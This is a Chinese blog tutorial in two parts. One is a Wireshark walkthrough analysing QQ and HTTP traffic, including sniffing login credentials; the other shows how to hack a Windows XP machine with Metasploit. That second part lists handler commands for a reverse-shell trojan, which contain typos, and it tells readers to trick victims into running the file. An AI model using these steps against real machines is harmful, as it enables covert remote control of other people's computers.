wireshark抓包和利用kali(linux)攻击windows

最新推荐文章于 2024-05-14 09:09:08 发布
最新推荐文章于 2024-05-14 09:09:08 发布
阅读量1.5k 收藏 8
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45969832/article/details/113871509
版权

简介

wireshark是一款操作简单,容易上手的网络抓包分析软件。百度可直接下载汉化版。玩了一下午,先后对本校财务处网站,QQ等进行抓包,写几点心得与大家分享一下。 
ps、抓包无非是对tcp/ip五层协议进行分析,所以阅读本文需要具备网络基础。

教程

这里写图片描述

点击+号,选择过滤流,可以只过滤网站; 
地址栏:可以选择过滤的协议http、tcp、dns等;oicq是QQ;

tcp三次握手

在得到http响应时,进行三次tcp握手; 
在得到http响应时,进行三次tcp握手;
1、第一次握手:客户端发送syn=0 
这里写图片描述
2、第二次握手:服务器ack+1 
这里写图片描述
3、第三次握手:syn+1 
这里写图片描述

追踪tcp流

右键选择追踪流,可显示相关流的信息,出现乱码,证明该流是加密的,如QQ消息; 
这里写图片描述

通过5层协议分析 QQ

1、应用层

应用 
开头:oicq-im软件 
data流显示了QQ号

2、传输层

在两个主机间提供多种服务,包括建立连接、终止; 
传输
UDP传输:源端口8000(国内默认为QQ的端口),目的端口4002;

3、协议层

逻辑寻址,路由选择,确定最佳路线; 
协议
IPv4的版本;src源地址、dst目的地址; 
存活时间56;

4、数据链路层

为了适应物理介质中传输,将数据格式化成帧; 
数据链路
目的MAC、源MAC;路由MAC;

5、物理层

物理特征; 
物理
网络接口、设备地址;

另外可以对http网站抓包分析出,登陆是传输的账号和密码;这个挺有意思的哦!!

利用kali(linux)攻击windows

许多人觉的杀毒软件没啥乱用,留着占内存,或者在安全卫士和杀毒两个之间取舍一个,,,我想说的是,这太没有文化了。。文末会告诉大家为什么太没有文化的原因,,敬请往后看。。。

今天我给大家带来的是Hacker如何使用 三行代码入侵Windows的教程。

环境:kali+Windows xp

工具:kali>metasploit

有人肯定要想kali是什么呢,请看下图LOGO,看见没,是不是很霸气的一条带翅膀的龙!!超爱这个logo。。。咦,该进入正题了。。

三行代码攻击window!!!你的电脑如何才能安全呢!!

 

在kali环境下root输入一下三行代码

三行代码攻击window!!!你的电脑如何才能安全呢!!

(LHOST 本地ip)此时就生成了一个名为test.exe的测试木马。。

Msf> use exploit/multi/handler

(handler)>set payloud windows/meterpreter/reverse_tcp

  >show options

  >show LHOST 本地ip 

  >exploit

(此时这个木马就已经加载好了,如下图的监听模式)

三行代码攻击window!!!你的电脑如何才能安全呢!!

接下来就是想办法让Windows下载这个木马并加载,这就要看自己的套路有多深了,我就不多赘述(具体可以看 社会工程学 这本书)。

我自己的Windows 下载了这个木马。。打开之后我的Windows边已经被监听了,Windows里面的内容被暴露无疑。。

三行代码攻击window!!!你的电脑如何才能安全呢!!

 

•reboot-重新启动受害人的计算机(现在知道你的电脑为啥无缘无故就重启了吧,Hacker一个命令而已)

•ps -列出正在运行的进程

一个ps命令的使用,使你电脑里面的所有文件被光天化日的拉出来了,而这一切的一切都在毫无察觉的情况下发生了。

三行代码攻击window!!!你的电脑如何才能安全呢!!

看起来好厉害,对吧。。。那如何防止这种事情发生呢。

1.不要随便点击来历不明的文件以及安装包。要到正规网站下载。

2.安装杀毒软件和安全卫士

 

 

珍奇国英
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
《黑客之道》- kali LInuxWireShark抓包及常用协议分析
xueshenlaila的博客
11-03 786
Kali Linux --《网络安全》-- 使用 WireShark 对常用协议抓包并分析原理
xueshenlaila的博客
08-03 4269
文章目录前言常用协议分析-ARP 协议常用协议分析-ICMP 协议常用协议分析-TCP 协议常用协议分析-HTTP 协议 前言 作为一款高效免费的抓包工具,wireshark可以捕获并描述网络数据包,其最大的优势就是免费、开源以及多平台支持,在GNU通用公共许可证的保障范围下,用户可以免费获取软件和代码,并拥有对其源码修改和定制的权利,如今其已是全球最广泛的网络数据包分析软件之一。接下来我就带大家用WireShark 实战:使用 WireShark 对常用协议抓包并分析原理 常用协议分析-ARP
WireShark虚拟机数据包捕获
qq_43776408的博客
06-28 8477
选中指定网卡进行流量嗅探 使用netdiscover软件进行配合 //////////////////////////////// 先获取你的kaili虚拟机的ip比如192.156.4.5 探测与你虚拟机处于同一网段下(即当前局域网)的主机 即192.156.4.1一直寻找到192.156.4.254 探测过程其实就是发送ARP请求 你可以通过WireShark抓包看出来 最终扫描结果 发现了三台机器 ...
抓包协议分析实验/Kali Linux --《网络安全》-- 使用 WireShark 对常用协议抓包并分析原理_小白信息安全笔记
程序员三九的博客
05-14 440
前言作为一款高效免费的抓包工具,可以捕获并描述网络数据包,其最大的优势就是免费、开源以及多平台支持,在GNU通用公共许可证的保障范围下,用户可以免费获取软件和代码
kali linux抓包教程,kali linux操作系统中TCPDUMP详细使用方法
weixin_35782556的博客
05-08 3036
Kali自带Wireshark,但一般的Linux系统是不带的,需要自行下载,并且过程略复杂而纯字符界面的Linux系统无法使用Wireshark但是,所有Linux系统都会安装TCPDUMP:一种基于命令行的抓包工具注意事项:默认只抓68字节,能够获得基本信息,但无法做到完整分析1:开始抓包,-i 参数:eth0网卡,-s 0 表示抓取全部,-w a.cap 表示把抓到的内容放在a.cap文件中...
【网络技术】【Kali LinuxWireshark嗅探(一)ping和ICMP
weixin_43031313的博客
12-27 1184
本系列实验均使用虚拟机完成,主机操作系统为Windows 11,虚拟化平台选择Oracle VM VirtualBox,组网模式选择“NAT网络”。本次实验使用2个虚拟机,操作系统分别为Kali Linux和Ubuntu Linux,网络模式选择NAT网络。本次实验的组网如下图所示。本次实验使用wireshark流量分析工具进行网络嗅探,旨在了解ping命令的原理及过程。可以看到request(请求)和reply(应答)报文。(1)获得目标主机Ubuntu Linux的IP地址。(3)ICMP报文捕获。
linuxwireshark抓包权限不足问题解决
csdn_wangyixiao的博客
08-12 1325
linux环境下以普通用户启动wireshark没有抓包权限
Kali Linux使用TcpDump、Wireshark分析网络数据、arpspoof进行网络欺骗
qwer_gm的博客
07-01 801
监听网卡 eth0 -v 表示以verbose mode显示, -i指定。-w 后为文件名 里面保存的是捕获的数据 Ctrl + C停止。= 这个运算符来过滤端口不是80。菜单启动:09-嗅探/欺骗 | wireshark。使用32位windows靶机的IP地址与默认网关。还有一种方式:在命令行输入名字也可以。有三个模块,每个模块有各自的功能。记得去ping一下,查看网络。点击捕获 --> 选项。ip为自己所用的靶场ip。输入icmp进行过滤。使用运算符==来过滤。
【网络技术】【Kali LinuxWireshark嗅探(六)地址解析协议(ARP)
weixin_43031313的博客
01-03 994
地址解析协议(Address Resolution Protocol,ARP)位于网络层(IP层),被IP协议所使用。该协议的作用是从IP地址,解析出数据链路层所使用的硬件(MAC)地址。
kali-wireshark抓取客户端访问ftp的用户名和密码-运维安全详细笔记
06-30
kali 机器上,我们打开了 wireshark 抓包工具,并开始抓包。 4. 在 Windows 机器上访问 ftp 服务端 在 Windows 机器上,我们访问了 ftp 服务端,并输入了用户名和密码。 5. 在 kali 机器上查看抓到的用户名和...
Wireshark抓包工具使用分享
12-06
Wireshark抓包工具使用分享 经验之谈 绝对受用
Linux命令行抓包及包解析工具tshark(wireshark)使用实例解析.txt
10-31
Linux命令行抓包及包解析工具tshark(wireshark)使用实例解析.txt
kali壁纸,拿来当当windows壁纸也挺不错的
01-24
Kali Linux包含了众多渗透测试工具,如Nmap用于网络扫描,Wireshark用于网络抓包,Metasploit Framework则用于漏洞利用等。这些工具背后的知识和技术对于网络安全专业人士和爱好者来说都是宝贵的资源。 总的来说,...
NETGEAR A6210 sniffer抓包网卡驱动
04-26
这个驱动文件通常包含了一系列的驱动程序和配置工具,用于安装和配置网卡以适应抓包需求。 安装sniffer驱动的过程相对复杂,一般需要以下步骤: 1. 下载适用于Windows操作系统的NETGEAR A6210 sniffer驱动压缩包。 ...
取暖锅炉管理制度.docx
07-09
取暖锅炉管理制度
“人力资源+大数据+薪酬报告+涨薪调薪”
最新发布
07-09
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
述职报告(24)PPT模板.pptx
07-09
述职报告(24)PPT模板.pptx
kali中使用wireshark抓包
06-28
### 回答1: 在Kali中使用Wireshark抓包,可以按照以下步骤进行操作: 1. 打开终端,输入命令“wireshark”启动Wireshark。 2. 在Wireshark的主界面中,选择需要抓取的网络接口,如eth0或wlan0。 3. 点击“开始捕获”按钮,开始抓取数据包。 4. 在捕获过程中,可以使用过滤器对数据包进行过滤,只显示需要的数据包。 5. 抓取完成后,可以对数据包进行分析和解码,以获取更多的信息。 6. 最后,可以将抓取到的数据包保存到文件中,以便后续分析和研究。 总之,使用Wireshark抓包Kali中网络安全分析的重要工具之一,可以帮助我们深入了解网络通信过程,发现潜在的安全问题。 ### 回答2: 在Kali Linux操作系统中,Wireshark是一款强大的网络分析工具,可以帮助用户抓取网络数据包并分析网络流量。使用Wireshark进行抓包需要以下几个步骤: 步骤1:安装Wireshark WiresharkKali Linux操作系统自带的工具之一,如果尚未安装,则可以通过以下命令在命令行中安装: sudo apt-get install wireshark 步骤2:打开Wireshark 打开终端并输入wireshark命令,Wireshark将开始运行。 步骤3:选择抓包接口 选择要抓取数据包的网络接口。可以通过单击Wireshark左上角的“热点”符号打开捕获选项对话框以选择网络接口。 步骤4:开始抓包 选定网络接口之后,可以单击“开始捕获”按钮开始抓取数据包。抓取过程中,Wireshark将显示网络流量的实时信息,包括协议、源IP地址、目标IP地址、源端口、目标端口、数据长度等。 步骤5:分析数据包 将捕获到的数据包保存为文件,然后可以使用Wireshark的分析工具对文件进行分析,查看数据包的详细信息。Wireshark提供了多种分析工具,如过滤器、统计信息等。 总的来说,使用Wireshark进行抓包是一项非常实用的技能。对于网络安全人员和网络管理员来说,了解如何使用Wireshark抓取数据包是必不可少的。此外,使用Wireshark还可以通过抓包,更好地理解网络协议、优化网络性能,并捕获网络攻击行为。 ### 回答3: Kali Linux是一款广泛用于网络渗透测试的操作系统,而Wireshark则是一款可以实时监测和捕获网络数据包的软件。在Kali Linux中使用Wireshark抓包可以帮助我们发现网络上的安全漏洞和隐患。下面是详细的步骤: 1. 打开Wireshark:我们可以使用命令行输入“wireshark”来打开Wireshark,也可以在Kali Linux的用户界面中找到Wireshark图标并点击打开。 2. 选择要监听的网络接口:在Wireshark的主界面中,我们需要选择要监听的网络接口。在界面左上角的下拉菜单中,找到“Interface”并选择我们要监听的网络接口。例如,我们想监听eth0接口,则应选择“eth0”。 3. 开始抓包:在Wireshark的主界面中,点击“Start”按钮,Wireshark就会开始抓取该网络接口上的数据包。我们可以看到Wireshark开始实时监测网络接口的每个数据包。 4. 分析捕获的数据包:当Wireshark开始抓包后,我们可以在主界面中看到抓取到的数据包的详细信息。这些信息包括源IP地址、目标IP地址、使用的协议、数据包大小等。我们还可以使用Wireshark的过滤功能来查找特定的数据包。 5. 停止捕获:当我们完成了对网络数据包的抓取和分析后,可以点击“Stop”按钮来停止捕获。在停止捕获后,Wireshark会自动保存捕获到的数据包。 总之,在Kali Linux中使用Wireshark抓取网络数据包是非常重要的,可以帮助我们深入了解网络的运行机制,发现网络中的安全隐患。同时,我们也需要了解网络抓包的规则和技巧,才能更好地保护我们的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

珍奇国英

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值